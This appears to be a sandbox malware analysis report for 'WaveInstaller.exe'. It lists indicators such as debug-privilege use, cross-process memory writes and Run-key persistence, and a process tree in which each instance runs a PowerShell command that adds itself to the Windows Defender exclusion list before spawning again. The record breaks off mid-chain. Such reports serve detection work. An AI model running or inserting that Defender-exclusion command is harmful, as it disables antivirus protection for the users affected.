Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4628	powershell.exe
4628	powershell.exe
4476	powershell.exe
4476	powershell.exe
2944	powershell.exe
2944	powershell.exe
2944	powershell.exe
3332	Sync Center.exe
3952	powershell.exe
3952	powershell.exe
3728	powershell.exe
3728	powershell.exe
2864	powershell.exe
2864	powershell.exe
2864	powershell.exe
2544	Sync Center.exe
2252	powershell.exe
2252	powershell.exe
2252	powershell.exe
1240	powershell.exe
1240	powershell.exe
1240	powershell.exe
4412	powershell.exe
4412	powershell.exe
4412	powershell.exe
4664	powershell.exe
4664	powershell.exe
1864	powershell.exe
1864	powershell.exe
1864	powershell.exe
4664	powershell.exe
384	Sync Center.exe
384	Sync Center.exe
4444	powershell.exe
4444	powershell.exe
4444	powershell.exe
1624	powershell.exe
1624	powershell.exe
1624	powershell.exe
4520	powershell.exe
4520	powershell.exe
4520	powershell.exe
3452	powershell.exe
3452	powershell.exe
3452	powershell.exe
2968	powershell.exe
2968	powershell.exe
2968	powershell.exe
1860	Sync Center.exe
1860	Sync Center.exe
1864	powershell.exe
1864	powershell.exe
1864	powershell.exe
1844	powershell.exe
1844	powershell.exe
1844	powershell.exe
3624	powershell.exe
3624	powershell.exe
3624	powershell.exe
2984	Sync Center.exe
2984	Sync Center.exe
444	powershell.exe
444	powershell.exe
444	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5080	WaveInstaller.exe
Token: SeDebugPrivilege	4628	powershell.exe
Token: SeDebugPrivilege	4476	powershell.exe
Token: SeDebugPrivilege	3260	calcc.exe
Token: SeDebugPrivilege	2944	powershell.exe
Token: SeDebugPrivilege	3332	Sync Center.exe
Token: SeDebugPrivilege	3516	WaveInstaller.exe
Token: SeDebugPrivilege	3952	powershell.exe
Token: SeDebugPrivilege	3728	powershell.exe
Token: SeDebugPrivilege	4148	calcc.exe
Token: SeDebugPrivilege	2864	powershell.exe
Token: SeDebugPrivilege	2544	Sync Center.exe
Token: SeDebugPrivilege	1264	WaveInstaller.exe
Token: SeDebugPrivilege	2252	powershell.exe
Token: SeDebugPrivilege	1240	powershell.exe
Token: SeDebugPrivilege	4412	powershell.exe
Token: SeDebugPrivilege	4856	calcc.exe
Token: SeDebugPrivilege	1864	powershell.exe
Token: SeDebugPrivilege	4664	powershell.exe
Token: SeDebugPrivilege	384	Sync Center.exe
Token: SeDebugPrivilege	4444	powershell.exe
Token: SeDebugPrivilege	1624	powershell.exe
Token: SeDebugPrivilege	4900	WaveInstaller.exe
Token: SeDebugPrivilege	4520	powershell.exe
Token: SeDebugPrivilege	3260	calcc.exe
Token: SeDebugPrivilege	3452	powershell.exe
Token: SeDebugPrivilege	5020	calcc.exe
Token: SeDebugPrivilege	2968	powershell.exe
Token: SeDebugPrivilege	1860	Sync Center.exe
Token: SeDebugPrivilege	4836	WaveInstaller.exe
Token: SeDebugPrivilege	1864	powershell.exe
Token: SeDebugPrivilege	1844	powershell.exe
Token: SeDebugPrivilege	2308	calcc.exe
Token: SeDebugPrivilege	3624	powershell.exe
Token: SeDebugPrivilege	2984	Sync Center.exe
Token: SeDebugPrivilege	3780	WaveInstaller.exe
Token: SeDebugPrivilege	444	powershell.exe
Token: SeDebugPrivilege	4236	powershell.exe
Token: SeDebugPrivilege	2960	calcc.exe
Token: SeDebugPrivilege	1844	powershell.exe
Token: SeDebugPrivilege	3164	Sync Center.exe
Token: SeDebugPrivilege	2128	WaveInstaller.exe
Token: SeDebugPrivilege	2144	powershell.exe
Token: SeDebugPrivilege	2544	powershell.exe
Token: SeDebugPrivilege	3660	calcc.exe
Token: SeDebugPrivilege	3952	powershell.exe
Token: SeDebugPrivilege	1144	Sync Center.exe
Token: SeDebugPrivilege	1652	WaveInstaller.exe
Token: SeDebugPrivilege	2368	powershell.exe
Token: SeDebugPrivilege	4768	powershell.exe
Token: SeDebugPrivilege	4344	calcc.exe
Token: SeDebugPrivilege	4708	powershell.exe
Token: SeDebugPrivilege	3252	Sync Center.exe
Token: SeDebugPrivilege	1364	WaveInstaller.exe
Token: SeDebugPrivilege	5032	powershell.exe
Token: SeDebugPrivilege	3772	powershell.exe
Token: SeDebugPrivilege	3832	calcc.exe
Token: SeDebugPrivilege	2252	powershell.exe
Token: SeDebugPrivilege	4888	Sync Center.exe
Token: SeDebugPrivilege	3940	WaveInstaller.exe
Token: SeDebugPrivilege	1124	powershell.exe
Token: SeDebugPrivilege	1796	powershell.exe
Token: SeDebugPrivilege	3224	calcc.exe
Token: SeDebugPrivilege	3772	powershell.exe

Suspicious use of FindShellTrayWindow 38 IoCs

pid	Process
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe

Suspicious use of SendNotifyMessage 38 IoCs

pid	Process
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe
4880	taskmgr.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1692	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5080 wrote to memory of 4628	5080	WaveInstaller.exe	89
PID 5080 wrote to memory of 4628	5080	WaveInstaller.exe	89
PID 5080 wrote to memory of 3516	5080	WaveInstaller.exe	93
PID 5080 wrote to memory of 3516	5080	WaveInstaller.exe	93
PID 5080 wrote to memory of 4476	5080	WaveInstaller.exe	94
PID 5080 wrote to memory of 4476	5080	WaveInstaller.exe	94
PID 5080 wrote to memory of 3260	5080	WaveInstaller.exe	97
PID 5080 wrote to memory of 3260	5080	WaveInstaller.exe	97
PID 5080 wrote to memory of 2944	5080	WaveInstaller.exe	98
PID 5080 wrote to memory of 2944	5080	WaveInstaller.exe	98
PID 5080 wrote to memory of 3332	5080	WaveInstaller.exe	100
PID 5080 wrote to memory of 3332	5080	WaveInstaller.exe	100
PID 3516 wrote to memory of 3952	3516	WaveInstaller.exe	101
PID 3516 wrote to memory of 3952	3516	WaveInstaller.exe	101
PID 3516 wrote to memory of 1264	3516	WaveInstaller.exe	103
PID 3516 wrote to memory of 1264	3516	WaveInstaller.exe	103
PID 3516 wrote to memory of 3728	3516	WaveInstaller.exe	104
PID 3516 wrote to memory of 3728	3516	WaveInstaller.exe	104
PID 3516 wrote to memory of 4148	3516	WaveInstaller.exe	107
PID 3516 wrote to memory of 4148	3516	WaveInstaller.exe	107
PID 3516 wrote to memory of 2864	3516	WaveInstaller.exe	108
PID 3516 wrote to memory of 2864	3516	WaveInstaller.exe	108
PID 3516 wrote to memory of 2544	3516	WaveInstaller.exe	110
PID 3516 wrote to memory of 2544	3516	WaveInstaller.exe	110
PID 1264 wrote to memory of 2252	1264	WaveInstaller.exe	115
PID 1264 wrote to memory of 2252	1264	WaveInstaller.exe	115
PID 1264 wrote to memory of 4900	1264	WaveInstaller.exe	117
PID 1264 wrote to memory of 4900	1264	WaveInstaller.exe	117
PID 1264 wrote to memory of 1240	1264	WaveInstaller.exe	118
PID 1264 wrote to memory of 1240	1264	WaveInstaller.exe	118
PID 3260 wrote to memory of 4412	3260	calcc.exe	120
PID 3260 wrote to memory of 4412	3260	calcc.exe	120
PID 1264 wrote to memory of 4856	1264	WaveInstaller.exe	122
PID 1264 wrote to memory of 4856	1264	WaveInstaller.exe	122
PID 1264 wrote to memory of 1864	1264	WaveInstaller.exe	123
PID 1264 wrote to memory of 1864	1264	WaveInstaller.exe	123
PID 3260 wrote to memory of 4664	3260	calcc.exe	125
PID 3260 wrote to memory of 4664	3260	calcc.exe	125
PID 1264 wrote to memory of 384	1264	WaveInstaller.exe	129
PID 1264 wrote to memory of 384	1264	WaveInstaller.exe	129
PID 3260 wrote to memory of 4444	3260	calcc.exe	130
PID 3260 wrote to memory of 4444	3260	calcc.exe	130
PID 3260 wrote to memory of 1624	3260	calcc.exe	132
PID 3260 wrote to memory of 1624	3260	calcc.exe	132
PID 4900 wrote to memory of 4520	4900	WaveInstaller.exe	134
PID 4900 wrote to memory of 4520	4900	WaveInstaller.exe	134
PID 3260 wrote to memory of 3068	3260	calcc.exe	136
PID 3260 wrote to memory of 3068	3260	calcc.exe	136
PID 4900 wrote to memory of 4836	4900	WaveInstaller.exe	138
PID 4900 wrote to memory of 4836	4900	WaveInstaller.exe	138
PID 4900 wrote to memory of 3452	4900	WaveInstaller.exe	139
PID 4900 wrote to memory of 3452	4900	WaveInstaller.exe	139
PID 4900 wrote to memory of 5020	4900	WaveInstaller.exe	141
PID 4900 wrote to memory of 5020	4900	WaveInstaller.exe	141
PID 4900 wrote to memory of 2968	4900	WaveInstaller.exe	142
PID 4900 wrote to memory of 2968	4900	WaveInstaller.exe	142
PID 4900 wrote to memory of 1860	4900	WaveInstaller.exe	144
PID 4900 wrote to memory of 1860	4900	WaveInstaller.exe	144
PID 4836 wrote to memory of 1864	4836	WaveInstaller.exe	147
PID 4836 wrote to memory of 1864	4836	WaveInstaller.exe	147
PID 4836 wrote to memory of 3780	4836	WaveInstaller.exe	149
PID 4836 wrote to memory of 3780	4836	WaveInstaller.exe	149
PID 4836 wrote to memory of 1844	4836	WaveInstaller.exe	150
PID 4836 wrote to memory of 1844	4836	WaveInstaller.exe	150

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe
"C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe"
1⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5080
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4628
- C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe
  "C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe"
  2⤵
  - Checks computer location settings
  - Adds Run key to start application
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3516
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3952
- - C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe
    "C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe"
    3⤵
    - Checks computer location settings
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1264
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2252
  - - C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe
      "C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe"
      4⤵
      Checks computer location settings
      Adds Run key to start application
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4900
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4520
    - - C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe"
        5⤵
        Checks computer location settings
        Adds Run key to start application
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4836
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1864
      - C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe"
        6⤵
        Checks computer location settings
        Adds Run key to start application
        Suspicious use of AdjustPrivilegeToken
        
        PID:3780
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:444
        
        C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe"
        7⤵
        Checks computer location settings
        Adds Run key to start application
        Suspicious use of AdjustPrivilegeToken
        
        PID:2128
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2144
        
        C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe"
        8⤵
        Checks computer location settings
        Adds Run key to start application
        Suspicious use of AdjustPrivilegeToken
        
        PID:1652
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe'
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2368
        
        C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe"
        9⤵
        Checks computer location settings
        Adds Run key to start application
        Suspicious use of AdjustPrivilegeToken
        
        PID:1364
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe'
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:5032
        
        C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe"
        10⤵
        Checks computer location settings
        Adds Run key to start application
        Suspicious use of AdjustPrivilegeToken
        
        PID:3940
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe'
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1124
        
        C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe"
        11⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:4176
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe'
        12⤵
        
        PID:2324
        
        C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe"
        12⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:2944
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe'
        13⤵
        
        PID:3516
        
        C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe"
        13⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:4664
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe'
        14⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4132
        
        C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe"
        14⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:4524
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe'
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3040
        
        C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe"
        15⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:2016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe'
        16⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4612
        
        C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe"
        16⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:1528
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe'
        17⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1264
        
        C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe"
        17⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:1472
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe'
        18⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2016
        
        C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe"
        18⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:2768
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe'
        19⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2472
        
        C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe"
        19⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:572
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe'
        20⤵
        
        PID:3160
        
        C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe"
        20⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:968
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe'
        21⤵
        
        PID:3604
        
        C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe"
        21⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:5020
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe'
        22⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4584
        
        C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe"
        22⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:4088
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe'
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4444
        
        C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe"
        23⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:4488
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe'
        24⤵
        
        PID:4348
        
        C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe"
        24⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:1648
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe'
        25⤵
        
        PID:4088
        
        C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe"
        25⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:1664
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe'
        26⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2448
        
        C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe"
        26⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:2924
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe'
        27⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3272
        
        C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe"
        27⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:2960
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe'
        28⤵
        
        PID:5008
        
        C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe"
        28⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:3780
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe'
        29⤵
        
        PID:5012
        
        C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe"
        29⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:4768
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe'
        30⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3824
        
        C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe"
        30⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:3772
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe'
        31⤵
        
        PID:4984
        
        C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe"
        31⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:688
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe'
        32⤵
        
        PID:1800
        
        C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe"
        32⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:2540
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe'
        33⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2968
        
        C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe"
        33⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:3040
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
